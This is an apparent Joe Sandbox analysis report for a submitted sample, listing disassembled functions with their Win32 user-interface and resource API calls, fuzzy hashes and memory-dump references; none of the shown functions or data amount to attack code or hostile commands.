Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 26f46317b2b203dace51befe63446614938ff65dd40ab13039e8764bca96b316
Instruction ID: 019a759daf155a922748b9c84a1b0bf48e02316a4d5ab7242f1fd10e1617548e
Opcode Fuzzy Hash: 26f46317b2b203dace51befe63446614938ff65dd40ab13039e8764bca96b316
Instruction Fuzzy Hash: 1F018671104214BFEB00AB758C45EAA7BACFF54335B200758F426E62D2DF74E8408654

Function 004F8758 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,00000002,00000002), ref: 004F8794
InvalidateRect.USER32(?,?,00000001), ref: 004F87A5
UpdateWindow.USER32(?), ref: 004F87AE
SetRectEmpty.USER32(?), ref: 004F87BB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$EmptyInflateInvalidateUpdateWindow
String ID:
API String ID: 3040190709-0
Opcode ID: 268fecea43e075d17e63ae18e586cffe4d8fb159e8c61f9e17df4435a3b50542
Instruction ID: e1c1fd5077575c8edb594bb857a6ed1f906aa817a891d80f8222d159ed9abdaf
Opcode Fuzzy Hash: 268fecea43e075d17e63ae18e586cffe4d8fb159e8c61f9e17df4435a3b50542
Instruction Fuzzy Hash: 860184715001099BCF00DFA8DC89BA67BB8FB09721F100265AD06EE0A6CB716549CF60

Function 005B38FB Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000000,?), ref: 005B3935
InflateRect.USER32(?,00000002,00000002), ref: 005B3943
InvalidateRect.USER32(?,?,00000001,?,?,?,005B3BE1,?), ref: 005B3952
UpdateWindow.USER32(?), ref: 005B395B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$InflateInvalidateOffsetUpdateWindow
String ID:
API String ID: 222119783-0
Opcode ID: 1f3088ca54b01279968e3dae9df911ec1bf68a68cc61796c56ee9f20562a594f
Instruction ID: 4aac3c822860e5944d5e007f37f607598a0a2ceae665e0397ad7d23a8e22cf89
Opcode Fuzzy Hash: 1f3088ca54b01279968e3dae9df911ec1bf68a68cc61796c56ee9f20562a594f
Instruction Fuzzy Hash: 4D012C72601109AFCB00DFA8DD89FFA7BF9EB49700F510065BA06EB051CA71EA49DB61

Function 004ECA92 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,000000F0), ref: 004ECAB8
LoadResource.KERNEL32(?,00000000), ref: 004ECAC4
LockResource.KERNEL32(00000000), ref: 004ECAD1
FreeResource.KERNEL32(00000000,00000000), ref: 004ECAED

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 4321ef5c1b9ff64ad571ec9ccaf0e273bad0d7e5bc05f3e3b9007150b10d0f70
Instruction ID: 224880203457013581bdca0b7a6dd2cbe20b51ccfcef992dcf6ccec2ace3daa0
Opcode Fuzzy Hash: 4321ef5c1b9ff64ad571ec9ccaf0e273bad0d7e5bc05f3e3b9007150b10d0f70
Instruction Fuzzy Hash: DCF0CD362012567B87109FE79CC8A7BB65DEF54395705403AB901D3301DEB8DD05D664

Function 004ECE25 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004ECE3A
GetParent.USER32(?), ref: 004ECE49
GetParent.USER32(?), ref: 004ECE5F
SetFocus.USER32(?,00000000), ref: 004ECE75

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$Focus
String ID:
API String ID: 384096180-0
Opcode ID: 7b9fcae649ad4515aaf7607c0c86e50c3662cdf2d14e58ec4f0b8a91e4aa1a0d
Instruction ID: 5a83fde8c12e2d6d9a590a0c9405df79f695d15e3775b627e834a11871783a4d
Opcode Fuzzy Hash: 7b9fcae649ad4515aaf7607c0c86e50c3662cdf2d14e58ec4f0b8a91e4aa1a0d
Instruction Fuzzy Hash: DDF0CD726107809FCB207777AC08E6B76A6AFD831AF05096EF44586561DF78DC01DA54

Function 0053F635 Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000005,00000000,?,?,?,?,0052DAB9,?,?), ref: 0053F651
LoadResource.KERNEL32(?,00000000,?,?,?,?,0052DAB9,?,?), ref: 0053F659
LockResource.KERNEL32(00000000,?,?,?,?,0052DAB9,?,?), ref: 0053F666
FreeResource.KERNEL32(00000000,00000000,0052DAB9,?,?,?,?,?,0052DAB9,?,?), ref: 0053F67E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 289b4dc268a76b508f2f918bce226629f20583b98babdeb5dfc8f9914bb46e5b
Instruction ID: 580f1b95ed2f96ef85a48649f11e8a8704c0720b31eb9d4abb314f28e337d41a
Opcode Fuzzy Hash: 289b4dc268a76b508f2f918bce226629f20583b98babdeb5dfc8f9914bb46e5b
Instruction Fuzzy Hash: CEF0B436601115BBCB016BA99C4CCBFBB6DEF953A47014025F505D3221DF788D04E764

Function 005B02B8 Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66

UpdateWindow.USER32(?), ref: 005B02E5
UpdateWindow.USER32(?), ref: 005B02F1
SetRectEmpty.USER32(?), ref: 005B02FD
SetRectEmpty.USER32(?), ref: 005B0306

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$EmptyRectUpdate$Show
String ID:
API String ID: 1262231214-0
Opcode ID: f10944efdf17d7753e7f577bb6e6ca6d58db1a3d57cb2f8913b466ce5df5663c
Instruction ID: af7cd8b925dd86394f395ea1de38929f823a2a83c13b1c4c61ef5f850a8427a8
Opcode Fuzzy Hash: f10944efdf17d7753e7f577bb6e6ca6d58db1a3d57cb2f8913b466ce5df5663c
Instruction Fuzzy Hash: EFF08232600A149BD7216B25DC04F97BBE8BF84711F0A0529E19493070DB75F805CA90

Function 0054EB85 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0054EB8C

Part of subcall function 004FEB01: __EH_prolog3.LIBCMT ref: 004FEB08

Part of subcall function 0056D52B: __EH_prolog3.LIBCMT ref: 0056D532

Part of subcall function 005B4D84: __EH_prolog3.LIBCMT ref: 005B4D8B
Part of subcall function 005B4D84: DestroyIcon.USER32(?,00000004,0054EBC6,00000004,0054EE45,?,?,?), ref: 005B4DAE
Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DB6
Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DBE
Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DC6
Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DCE
Part of subcall function 005B4D84: DestroyIcon.USER32(?,?,?), ref: 005B4DD6
Part of subcall function 005B4D84: ~_Task_impl.LIBCPMT ref: 005B4E10

~_Task_impl.LIBCPMT ref: 0054EBD0

Part of subcall function 0053F764: __EH_prolog3.LIBCMT ref: 0053F76B

~_Task_impl.LIBCPMT ref: 0054EBDF
~_Task_impl.LIBCPMT ref: 0054EBEE

Part of subcall function 0054E64B: __EH_prolog3.LIBCMT ref: 0054E652

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: DestroyH_prolog3Icon$Task_impl
String ID:
API String ID: 115518600-0
Opcode ID: 5b1701f6b2adfd129d7beead8ecd0e0cb491b6b3b9d60c0f6eec10c5e8b20c37
Instruction ID: fa9c5750567c2d3d9722e0f687ea0a716c9f40cfb54b0f5d1b0d8eec8fb02191
Opcode Fuzzy Hash: 5b1701f6b2adfd129d7beead8ecd0e0cb491b6b3b9d60c0f6eec10c5e8b20c37
Instruction Fuzzy Hash: B6F01974801786CED719FBB4C21A7EDBFA4BF65304F50458CE5AA13282DB742B08DA62

Function 0057547F Relevance: 6.0, APIs: 4, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0057549A
SetRectEmpty.USER32(?), ref: 005754A0
SetRectEmpty.USER32(?), ref: 005754A6
SetRectEmpty.USER32(?), ref: 005754AC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 7f76bfe561cc83431f30f4dde29e02bbf082c081d617b4578602985a261bf262
Instruction ID: 81ca2d6e5e45e01afabe6474bff5df40297cd81f7d90005597f48e1d3d246dd8
Opcode Fuzzy Hash: 7f76bfe561cc83431f30f4dde29e02bbf082c081d617b4578602985a261bf262
Instruction Fuzzy Hash: 66E0C9B64007199AC730AB6AE844AD7B3ECAF84310B11091EE582C3514DA79F589CF94

Function 005290B3 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 005293A7

Part of subcall function 005286AD: __EH_prolog3_GS.LIBCMT ref: 005286B4

Strings

83`, xrefs: 00529177, 005292D1, 00529330

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3_Parent
String ID: 83`
API String ID: 383333065-1826646354
Opcode ID: 8e8d8b2e981467a6a9581a40a0c3c5a77ad2bf0d386e0a72d33beae32b0622f1
Instruction ID: e1c671cf9dea4a4be52a38ea0bbdcd70dc567441757dcb553e1c5eed0ff68cce
Opcode Fuzzy Hash: 8e8d8b2e981467a6a9581a40a0c3c5a77ad2bf0d386e0a72d33beae32b0622f1
Instruction Fuzzy Hash: A581D134300611AFDB14EB66D899ABE7BE9BF99704F04082EF5468B3D1DF75AA40CB41

Function 0054321D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 227COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 005432FA
__floor_pentium4.LIBCMT ref: 0054330F

Strings

TR`, xrefs: 00543434

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: __floor_pentium4
String ID: TR`
API String ID: 4168288129-1372258800
Opcode ID: ab2adc395457c2f0651f789bcdb8e98e96a59bbf3267f67ebd409e14be92367c
Instruction ID: ca8bb30c100019b2f95e6fe1ea4076edd5ae5a75e68e4aa282006f54ba3e4a4e
Opcode Fuzzy Hash: ab2adc395457c2f0651f789bcdb8e98e96a59bbf3267f67ebd409e14be92367c
Instruction Fuzzy Hash: 8881A470E0060AEBCF09DFA4D1896EDBFB5FF44344F20C49EE496A62A1DB319A51CB54

Function 0052638E Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 215COMMON

Download Yara Rule

APIs

Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F

GetWindowRect.USER32(?,?), ref: 00526534

Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66

Part of subcall function 005257F1: IsWindowVisible.USER32(?), ref: 0052580D
Part of subcall function 005257F1: MapWindowPoints.USER32(?,?,?,00000002), ref: 00525846
Part of subcall function 005257F1: GetWindowLongW.USER32(?,000000F0), ref: 00525890

Strings

83`, xrefs: 005263E5, 0052643B, 005264FE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$LongPointsRectShowVisible
String ID: 83`
API String ID: 705879729-1826646354
Opcode ID: 5fc94cf942df140d276dde2cb4ef49376ed7f2d6bae66d11e7bfa2e630a3e497
Instruction ID: c5ad9698410ae5e9d528f074973dbaae9ffb53742ad392b4569939dfa28be642
Opcode Fuzzy Hash: 5fc94cf942df140d276dde2cb4ef49376ed7f2d6bae66d11e7bfa2e630a3e497
Instruction Fuzzy Hash: 35812771A0022AEFCF18DFA9D9C59AEBBB5FF08314F10452EE555A7281CB34AD40CB64

Function 004FA106 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004FA33A
GetParent.USER32(?), ref: 004FA37D

Strings

To`, xrefs: 004FA38A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent
String ID: To`
API String ID: 975332729-992168270
Opcode ID: 292012a5fd7e86b61810fe6e9202a5e4e599bfe4390c78cfb937c259bf7618ef
Instruction ID: 545421e83e9bed45297437429322c9567a2a603addd7e68ab7c493a5851fc5f9
Opcode Fuzzy Hash: 292012a5fd7e86b61810fe6e9202a5e4e599bfe4390c78cfb937c259bf7618ef
Instruction Fuzzy Hash: 9561D5B1B04B05AFC721AF76E4296A677E5FF45344F11481FD68A823A5EB326810CF86

Function 005243CE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005243D8

Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88

Part of subcall function 0055ADE5: __EH_prolog3_GS.LIBCMT ref: 0055ADEF

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

\w`, xrefs: 0052447F
<L`, xrefs: 005244E1, 005244F2

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3_$Exception@8H_prolog3Throw_malloc
String ID: <L`$\w`
API String ID: 3649189929-1950207190
Opcode ID: 6b8cbbb3149b71c4713ed3c26cd60f153dabfbf30ceb028f7a91bd0e278c135b
Instruction ID: 0f43aa3ec215b71d6c6d66213eb09c750b54adcd3e3e08a5426831254ae6c33c
Opcode Fuzzy Hash: 6b8cbbb3149b71c4713ed3c26cd60f153dabfbf30ceb028f7a91bd0e278c135b
Instruction Fuzzy Hash: 7751A430A002289BCF29EB659C96EEDBBA5FF86710F24029AF556971D1DB309D80CF50

Function 004EF81D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 004EF457: GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00525927), ref: 004EF4CE
Part of subcall function 004EF457: GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 004EF4DE

Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4

GetWindowRect.USER32(?,?), ref: 004EF890
SetWindowRgn.USER32(?,00000000,00000001), ref: 004EF8DD

Strings

, xrefs: 004EF8B9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$AddressH_prolog3HandleModuleProcRect
String ID:
API String ID: 2106468464-3916222277
Opcode ID: beaa174338364bc090a8f42533f46ac0f766638520b5c54bb98b77abf65d6033
Instruction ID: 8bc58345040c9c21e186d7c35575297b82af6ffd1349f8586e15c72bec781318
Opcode Fuzzy Hash: beaa174338364bc090a8f42533f46ac0f766638520b5c54bb98b77abf65d6033
Instruction Fuzzy Hash: DE512A70A00648EFCB22DF66C844AEFBBF5FF88345F10453FE49A96251DB389944CA59

Function 0050EAFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

H_, xrefs: 0050EB92
h_, xrefs: 0050EBA6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

